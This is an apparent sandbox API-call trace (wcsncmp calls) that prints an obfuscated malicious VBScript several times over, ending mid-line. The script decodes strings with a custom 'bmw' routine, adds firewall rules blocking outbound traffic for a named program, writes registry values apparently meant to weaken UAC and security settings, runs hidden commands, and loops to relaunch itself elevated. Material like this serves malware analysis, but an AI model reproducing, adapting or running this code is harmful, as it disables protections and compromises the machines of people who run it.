bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -30 [0226.302] wcsncmp (_String1="\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.302] wcsncmp (_String1="\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0226.302] wcsncmp (_String1="while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.302] wcsncmp (_String1="hile (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0226.302] wcsncmp (_String1="ile (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 